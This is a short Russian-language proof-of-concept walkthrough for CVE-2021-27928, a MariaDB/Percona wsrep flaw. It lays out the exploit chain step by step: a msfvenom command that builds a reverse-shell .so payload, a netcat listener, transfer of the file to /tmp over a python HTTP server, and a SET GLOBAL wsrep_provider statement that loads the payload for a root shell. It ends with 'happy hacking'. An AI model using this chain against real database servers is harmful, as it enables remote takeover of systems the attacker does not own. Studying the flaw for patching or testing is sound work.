
CVE-2021-27928-POC
Проблема удаленного выполнения кода была обнаружена в MariaDB 10.2 до 10.2.37, 10.3 до 10.3.28, 10.4 до 10.4.18 и 10.5 до 10.5.9; в Percona Server до 2021-03-03; и в патче wsrep до 2021-03-03 для MySQL. Ненадежный путь поиска приводит к eval-инъекции, при которой SUPER-пользователь базы данных может выполнять команды ОС после изменения wsrep_provider и wsrep_notify_cmd. ПРИМЕЧАНИЕ: это не затрагивает продукт Oracle.
Создадим наш пейлоад с помощью Msfvenom. Для нашего пейлоада мы будем использовать /linux/x64/shell_reverse_tcp с нашим IP-адресом для LHOST и номером порта для LPORT. Также мы укажем тип файла с помощью -f, который в нашем случае — elf-so. И мы сохраним выходной файл как CVE-2021-27928.so с помощью опции -o.
msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f elf-so -o CVE-2021-27928.so

Наш пейлоад готов! Давайте настроим netcat как listener на нашем указанном порту.
Давайте переместим наш файл на целевую машину. Для этого мы можем использовать любой удобный способ. Я буду использовать python http server.

Сохраним файл в каталог /tmp.

Теперь нам нужно войти в базу данных и установить wsrep_provider на наш загруженный пейлоад.
SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";

Время проверить наш listener. Если все прошло успешно, мы должны получить root shell на машине!

Удачного хакинга!